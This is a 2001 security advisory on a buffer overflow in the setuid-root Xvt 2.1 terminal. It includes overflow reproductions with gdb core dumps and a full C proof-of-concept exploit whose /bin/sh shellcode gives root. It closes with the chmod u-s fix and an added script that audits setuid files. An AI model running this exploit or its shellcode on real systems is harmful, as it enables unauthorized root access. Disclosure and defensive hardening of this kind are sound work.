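Buffer Overflow Vulnerability in Xvt 2.1


Published: 2001-07-03
Updated: 2001-07-03
Severity:
Threat level: local administrator privileges
Error type: input validation error
Exploitation method: server mode

Affected systems
Xvt 2.1-Debian

Detailed description
Xvt is an X terminal emulator designed to be compatible with xterm while
using less swap space. It is available at the following address:
http://packages.debian.org/stable/x11/xvt.html

Passing an overly long argument to xvt's -T or -name command-line option
causes a buffer overflow. Because xvt is installed setuid root, this allows
a local user to gain root privileges.

Test code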
$ ls -l /usr/bin/X11/xvt
-rwsr-xr-x 1 root root 50288 Mar 26 2000 /usr/bin/X11/xvt



$ xvt -V
xvt version 2.1




A) xvt -name <buffer>



$ xvt -name `perl -e 'print "A"x234'`
Segmentation fault (core dumped)
$


tshaw:~$ gdb --core core
GNU gdb 5.0
<snip>
Core was generated by `xvt -name
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb)




B) xvt -T <buffer>



$ xvt -T `perl -e 'print "A"x262'`
Segmentation fault (core dumped)
$


$ gdb --core core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
<snip>
Core was generated by `xvt -T
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x804b043 in ?? ()
(gdb) where
#0 0x804b043 in ?? ()
#1 0x804c075 in ?? ()
#2 0x804b4f6 in ?? ()
#3 0x804a19c in ?? ()
(gdb) info reg
eax 0x8004100 134234368
ecx 0xffffffff -1
edx 0x805524f 134566479
ebx 0x8055148 134566216
esp 0xbfffdea0 0xbfffdea0
ebp 0xbfffdeac 0xbfffdeac
esi 0x8004141 134234433
edi 0x8004141 134234433
eip 0x804b043 0x804b043
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x2b 43
gs 0x2b 43
fctrl 0x0 0
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
(gdb)




----] proof of exploited code



--- expl.c ---

/*
   /usr/bin/X11/xvt overflow proof of concept by cb@t-online.fr.

   tshaw:~$ ./expl
   bash#
*/

#include <stdio.h>
#include <stdlib.h>

int main()
{
    char buf[234];
    int i;

    char code[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    for(i=0; i<76; i++)
        buf[i] = 0x41;

    *(long *)&buf[76]=0xbffffab0; /* ret addr */

    memset(buf + 80, 0x90, 234);
    memcpy(buf + 233 - strlen(code), code, strlen(code));

    buf[234] = '\0';

    execl("/usr/bin/X11/xvt", "xvt", "-name", buf, 0);
}

--- expl.c ---

Solution
# chmod u-s /usr/bin/X11/xvt
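
The fix above as a repeatable check, written as an added example that is not part of the original advisory: it lists setuid files under a directory and removes the bit with the same chmod u-s, then confirms the bit is gone. The function names and the optional OWNER argument are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the advisory): find setuid files and apply the
# advisory's "chmod u-s" fix, confirming afterwards that the bit is gone.
# Function names and the optional OWNER argument are assumptions.

# has_setuid FILE: succeed if FILE is a regular file with the setuid bit set.
has_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# list_setuid DIR [OWNER]: print setuid regular files under DIR owned by
# OWNER (default: root), without crossing onto other filesystems.
list_setuid() {
    find "$1" -xdev -type f -perm -4000 -user "${2:-root}" 2>/dev/null
}

# drop_setuid FILE: remove the setuid bit and verify the result.
# Succeeds when FILE ends up without the bit (also if it never had it).
drop_setuid() {
    has_setuid "$1" || return 0
    chmod u-s "$1" || return 1
    ! has_setuid "$1"
}

# Stand-alone use: ./audit.sh /usr/bin/X11   (report only, changes nothing)
if [ "$#" -gt 0 ]; then
    list_setuid "$1" | while IFS= read -r f; do
        ls -l "$f"
    done
fi
```

After drop_setuid, the mode shown by ls -l changes from -rwsr-xr-x to -rwxr-xr-x, so the overflow can no longer be reached with root privileges.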

Related information
Samuel Dralet samuel.dralet@mastersecurity.fr
Tufqi tuf@mmania.com